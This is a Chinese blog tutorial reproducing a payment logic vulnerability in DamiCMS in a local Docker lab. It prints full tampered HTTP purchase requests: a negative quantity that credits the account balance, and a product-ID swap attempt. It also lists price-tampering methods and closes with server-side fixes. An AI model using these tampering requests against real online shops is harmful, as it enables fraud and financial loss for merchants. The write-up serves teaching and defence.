支付逻辑漏洞复现

最新推荐文章于 2024-06-03 14:30:55 发布
最新推荐文章于 2024-06-03 14:30:55 发布
阅读量599 收藏 10
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全 网络安全 渗透测试 逻辑漏洞 支付漏洞 支付逻辑漏洞 网站安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44971640/article/details/137683774
版权

以下文章只用于技术交流,超出以外的后果与本作者无关。
请遵守网络安全法,请勿以身试法。

文章目录

大米CMS靶场搭建

sudo docker pull betsy0/pwdflielogic:latest
sudo docker run -d -p 10001:81 --restart=always
betsy0/pwdflielogic:latest

漏洞危害

支付漏洞通常都是篡改价格,比如,一分钱买任何东西、零元购、比原价低的价格购买等等,直接造成企业的经济损失。

测试方法

1、修改购买数量:在进行订单支付的时候修改物品的数量,可以支付一件商品的价格购买多件
2、修改商品金额为负数进行增加账户资金
3、修改支付价格
4、修改对应商品
5、修改支付状态
6、修改支付接口等等

漏洞复现

注册账号并登录系统

查看账号余额为0元,

选定需要购买的商品需要5400元,进行正常判断,肯定是余额不足无法支付的,我们抓包分析一下数据包,分析如下:

id%5B%5D=69   \\为商品编号
pic%5B%5D=%2FPublic%2FUploads%2Fthumb%2Fthumb_1393206337.jpg   \\图片地址
name%5B%5D=%E5%A4%A7%E7%B1%B3CMS%E6%89%8B%E6%9C%BA%E5%BC%80%E5%8F%91%E4%B8%93%E7%89%88& \\商品名字
gtype%5B%5D=%E7%81%B0%E8%89%B2&qty%5B%5D=1 \\类型
price%5B%5D=5400 \\价格

qty%5B%5D=1 \\商品数量

剩下的就是个人填的收货信息了


POST /index.php?s=/member/dobuy.html HTTP/1.1
Host: 192.168.174.147:10001
Content-Length: 365
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.174.147:10001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.174.147:10001/index.php?m=Member&a=gobuy&iscart=0&id=69&name=%E5%A4%A7%E7%B1%B3CMS%E6%89%8B%E6%9C%BA%E5%BC%80%E5%8F%91%E4%B8%93%E7%89%88&qty=1&price=5400&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393206337.jpg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=k7l6nvahojhq8ciog74q6330km; BkGOp9578O_think_template=default
Connection: close

id%5B%5D=69&pic%5B%5D=%2FPublic%2FUploads%2Fthumb%2Fthumb_1393206337.jpg&name%5B%5D=%E5%A4%A7%E7%B1%B3CMS%E6%89%8B%E6%9C%BA%E5%BC%80%E5%8F%91%E4%B8%93%E7%89%88&gtype%5B%5D=%E7%81%B0%E8%89%B2&qty%5B%5D=1&price%5B%5D=5400&realname=1&tel=1&province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC%E5%B8%82&area=%E4%B8%9C%E5%9F%8E%E5%8C%BA&address=1111&trade_type=3&iscart=0

分析数据包之后,对我们有价值可测试的地方就是商品编号和价格了,可以试试能不能用5400的价格购买比本身价格高的商品,但是我们账户没有余额,那么只能先测试价格参数是否存在支付逻辑漏洞,我们修改 qty%5B%5D=-10 ,那么如果存在支付逻辑漏洞我们余额会变成 54000

POST /index.php?s=/member/dobuy.html HTTP/1.1
Host: 192.168.174.147:10001
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.174.147:10001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.174.147:10001/index.php?m=Member&a=gobuy&iscart=0&id=69&name=%E5%A4%A7%E7%B1%B3CMS%E6%89%8B%E6%9C%BA%E5%BC%80%E5%8F%91%E4%B8%93%E7%89%88&qty=1&price=5400&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393206337.jpg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=k7l6nvahojhq8ciog74q6330km; BkGOp9578O_think_template=default
Connection: close

id%5B%5D=69&pic%5B%5D=%2FPublic%2FUploads%2Fthumb%2Fthumb_1393206337.jpg&name%5B%5D=%E5%A4%A7%E7%B1%B3CMS%E6%89%8B%E6%9C%BA%E5%BC%80%E5%8F%91%E4%B8%93%E7%89%88&gtype%5B%5D=%E7%81%B0%E8%89%B2&qty%5B%5D=-10&price%5B%5D=5400&realname=1&tel=1&province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC%E5%B8%82&area=%E4%B8%9C%E5%9F%8E%E5%8C%BA&address=1111&trade_type=3&iscart=0

发现订单居然下单成功,那我们来看看账户余额为54000,存在支付逻辑漏洞

继续测试是否存在低价格购买高价格商品漏洞,找到高价格商品编号127,金额为6000,找到低价商品4000,进行测试,在支付订单页面进行数据包修改。

POST /index.php?s=/member/dobuy.html HTTP/1.1
Host: 192.168.174.147:10001
Content-Length: 323
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.174.147:10001
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.174.147:10001/index.php?m=Member&a=gobuy&iscart=0&id=66&name=%E6%B5%8B%E8%AF%95%E4%BA%A7%E5%93%81&qty=1&price=4000&gtype=%E7%81%B0%E8%89%B2&pic=/Public/Uploads/thumb/thumb_1393207060.jpg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=k7l6nvahojhq8ciog74q6330km; BkGOp9578O_think_template=default
Connection: close

id%5B%5D=127&pic%5B%5D=%2FPublic%2FUploads%2Fthumb%2Fthumb_1393207060.jpg&name%5B%5D=%E6%B5%8B%E8%AF%95%E4%BA%A7%E5%93%81&gtype%5B%5D=%E7%81%B0%E8%89%B2&qty%5B%5D=1&price%5B%5D=4000&realname=1&tel=1&province=%E5%8C%97%E4%BA%AC&city=%E5%8C%97%E4%BA%AC%E5%B8%82&area=%E4%B8%9C%E5%9F%8E%E5%8C%BA&address=1&trade_type=3&iscart=0

订单下单成功,查看订单信息

测试失败,不存在此漏洞

修复方法

  1. 敏感参数使用密文传输;
  2. 服务端校验过滤用户提交的参数;
  3. 提交订单时后台判断单价是否与数据库中相符;
  4. 服务端计算金额是判断是否为正数;
  5. 生成数据签名,对用户金额和订单签名。
渗透测试小白
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
大米CMS
04-06
大米CMS是一个免费开源、快速、简单的PC建站和手机建站集成一体化系统,致力于为用户提供简单、快捷的PC建站和智能手机建站解决方案。大米CMS特点:1、扩展字段自定义,根据自己系统需要无限扩展字段,对于SELECT等下拉选项支持PHP代码生成OPTION,支持自定义多图多文件上传字段!2、后台栏目分类无限极,并可以控制字段的显示或隐藏,生成不同的管理表单,内置RBAC权限体系,分栏目权限,内容权限,方便管理3、列表模板(list目录下)和详细模板(page目录下)自定义,4、基于thinkphp MVC框架开发, 内置大量函数方便前台模板调用,大米拥有自己的万能标签与分类标签等方便调用数据5、作站灵活,可以将该系统做成任何类型网站,内置新闻类型站、企业站、手机3g站模型,通过http://***安装目录****/?t=xinwen这种查看,方便二次开发出不同模板7、支持伪静态与全站生成静态HTML,支持数据采集8、国内率先将微电商的概念引入CMS,让企业站不仅仅再是展示企业,可快速开展电子商务。集成支付宝标准双接口,支持购物车,可在线支付,货到付款,站内支付三种购买方式!会员集成QQ快捷登陆,支持购物订单通过电子邮件提醒!9、跨平台支持移动终端访问,自适应,不变形!可做手机APP等应用开发,内置JSON数据API接口10、国内CMS首创MSYQL表万能管理模型,输入MYSQL表名即可生成一个有增删改功能的管理模型,可快速在此基础上开发出自己想要的管理功能!11、配备手机数据交互接口JSON格式API12、支持中英等多语言大米CMS 更新日志:(1)增加管理员操作日志(2)管理员登录错误5次锁定15分钟(3)升级Kindeditor编辑器 多图多文件上传插件为html5支持的 不再依赖swf因为很多系统或浏览器禁用flash
漏洞是什么.txt
01-31
漏洞
damiCMS含有支付逻辑漏洞版本的源码.zip
03-16
damiCMS含有支付逻辑漏洞版本的源码,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
大米cms安装&支付逻辑漏洞
c0529的博客
06-03 362
链接:https://pan.baidu.com/s/1b-Z6RaFBZ6CsSIErY46Pyg?pwd=q8qq提取码:q8qq注意一下配置就可以了:php5.5+apache+mysql5.0,主要就是数据库版本要注意一下还是建议一开始就把数据库建好。
[zkaq靶场]逻辑漏洞--支付漏洞
wwxxee
05-10 1433
逻辑漏洞支付漏洞 案例: 修改支付价格:https://www.uedbox.com/post/22477/ 修改支付状态:https://www.uedbox.com/post/24090/ 修改优惠券积分:http://woo.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0156253 修改订单数量:https://www.uedbox.com/post/23143/ 越权支付:买自己的东西,扣别人的钱 防御方法: 后端检查每一项值,包括支付状态。
webug4.0靶场之支付漏洞
0nc3的博客
06-25 995
先测试一下购买流程,发点击可爱的小兔叽商品下的立即购买即弹窗提示购买成功。 于是我们点立即购买时抓包 发price参数由get方式传送 所以将100改为1再发包 ok~您花费了1元购买了可爱的小兔叽套装 ...
支付漏洞简介及靶场演示
seek_2022的博客
06-09 3370
本文简单介绍了一下支付漏洞的原理、挖掘及常见的防御方法,并通过靶场的演示,介绍了支付漏洞的利用方法。
渗透测试基础-支付漏洞
weixin_45488495的博客
05-01 905
渗透测试基础-支付漏洞支付:常见支付漏洞类型支付漏洞靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 支付支付又称付出、付给,多指付款,是发生在购买者和销售者之间的金融交换,是社会经济活动所引起的货币债权转移的过程。支付包括交易、清算和结算。 以前的支付,一般用物品做交换,最早是以物易物,然后在就有了钱币的概念,最近就是纸币和已经存在有一段时间的虚拟货币(正在推行中的中央数字货币也属于虚拟货币的一种) 在交易中,以前
大米CMS-PHP
06-20
大米CMS是一个免费开源、快速、简单的PC建站和手机建站集成一体化系统,致力于为用户提供简单、快捷的PC建站和智能手机建站解决方案。 大米CMS特点: 1、扩展字段自定义,根据自己系统需要无限扩展字段,对于SELECT等下拉选项支持PHP代码生成OPTION,支持自定义多图多文件上传字段! 2、后台栏目分类无限极,并可以控制字段的显示或隐藏,生成不同的管理表单,内置RBAC权限体系,分栏目权限,内容权限,方便管理 3、列表模板(list目录下)和详细模板(page目录下)自定义, 4、基于thinkphp MVC框架开发, 内置大量函数方便前台模板调用,大米拥有自己的万能标签与分类标签等方便调用数据 5、作站灵活,可以将该系统做成任何类型网站,内置新闻类型站、企业站、手机3g站模型,通过http://***安装目录****/?t=xinwen这种查看,方便二次开发出不同模板 7、支持伪静态与全站生成静态HTML,支持数据采集 8、国内率先将微电商的概念引入CMS,让企业站不仅仅再是展示企业,可快速开展电子商务。集成支付宝标准双接口,支持购物车,可在线支付,货到付款,站内支付三种购买方式!会员集成QQ快捷登陆,支持购物订单通过电子邮件提醒! 9、跨平台支持移动终端访问,自适应,不变形!可做手机APP等应用开发,内置JSON数据API接口 10、国内CMS首创MSYQL表万能管理模型,输入MYSQL表名即可生成一个有增删改功能的管理模型,可快速在此基础上开发出自己想要的管理功能! 11、配备手机数据交互接口JSON格式API 12、支持中英等多语言 大米CMS 更新日志: 采用最新的thinkphp6.X框架重构,做了大量封装,代码无任何加密 完全开源,支持composer更新,模板写法有少许变化,尽量遵照原来写法 让熟悉大米cms的可以快速上手
大米网站CMS系统
08-07
大米CMS是一个免费开源的,快速、简单的面向智能手机等移动终端的网站CMS系统. 大米CMS提供从服务器端网站到手机客户端以及客户端管理一整套的解决方案。你不需要会安卓开发,不需要对响应式网站布局有极强的理解。保持和你以前的网站建设开发习惯。简单快捷的建立手机网站。极大的降低了手机网站建设的技术投入和开发成本。 大米CMS ASP发布后,受到需多中小企建站的用户好评。考虑到ASP的局限性。我们开发了PHP版本的大米CMS。功能更完善,操作更方便。
大米CMS 手机站、PC站一体系统 v4.5.rar
07-10
大米CMS是一套手机网站、PC网站集成一体的建站系统,大米CMS支持伪静态与全站生成静态HTML,支持数据采集   ,内核基于thinkphp MVC框架,提供简单、快捷的PC建站和智能手机建站解决方案,并提供开源的安卓手机客户端(APK)和对应的服务器端系统源码下载。   大米CMS的另一个亮点是MSYQL表万能管理模型,输入MYSQL表名即可生成一个有增删改功能的管理模型,非常方便管理MYSQL。
vulhub漏洞 CVE-2016-3088
03-14
vulhub漏洞 CVE-2016-3088
靶场仅用于学习——支付漏洞
weixin_46601374的博客
03-28 9685
靶场,学习原理,维护安全,不准上升到实!!!! 这就是个靶场,在的网站那有这种漏洞。 快捷支付原理 商户网站接入支付结果有两种方式, 一种是通过浏览器进行跳转通知, 一种是服务器端异步通知 浏览器跳转 基于用户访问的浏览器,如果用户在银行页面支付成功后,直接关闭了页面,并未等待银行跳转到支付结果页面,那么商户网站就收不到支付结果的通知,导致支付结果难以处理。而且浏览器端数据很容易被篡改而降低安全性 服务器端异步通知 该方式是支付公司服务器后台直接向用户指定的异步通知URL发送参.
黑客攻防 通用0元支付逻辑漏洞安全参考
安全龙网络安全攻防实验室
10-25 745
本实验以攻击促进防御思想,通过对订单信息中的商品价格以及商品数量进行任意修改,从而形成0元支付逻辑漏洞,实验还展示了对漏洞代码的最佳安全修方案。 通过本实验进行深度进行0元支付逻辑漏洞攻击与防御的实验;我们提取了本实验的防御0元支付逻辑漏洞攻击安全策略,进行深度安全实践,在ThinkPHP5框架有真实场景实0元支付逻辑漏洞攻击与防御! 已实践的实验: TP5实践0元支付逻辑漏洞安全参考 本实...
20-PHP代码审计——damicms5.3-5.4支付逻辑漏洞分析
网络安全
06-19 1977
本次分析damicms的两个漏洞,一个是5.3版本的任意文件操作漏洞,另一个是5.4版本的逻辑支付漏洞
swagger漏洞
最新发布
06-29
Swagger 是一个流行的 API 设计和文档生成工具,但像任何软件一样,它可能存在安全漏洞 Swagger 漏洞通常涉及到以下几个步骤: 1. **漏洞识别**:首先需要找到 Swagger 安全漏洞的相关报告或文档,这些可能来自安全研究员的博客、CVE(Common Vulnerabilities and Exposures)公告或其他安全社区。 2. **漏洞利用**:理解漏洞的具体细节,这可能涉及对 Swagger 客户端库、服务器端实或其配置文件的特定攻击路径。有时候,可能需要构造特定的请求或提供特定的数据来触发漏洞。 3. **环境准备**:在本地环境中设置一个 Swagger 服务,并确保配置和版本与已知漏洞匹配,以便进行。 4. **过程**:使用工具如 Postman、curl 或自动化测试框架发送特定的请求,监控响应以确认漏洞是否被成功利用。 5. **证据收集**:记录下漏洞利用过程中的请求、响应以及任何敏感信息的泄露,作为漏洞的证据。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

渗透测试小白

如果您觉得满意,一分一毛也是爱

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值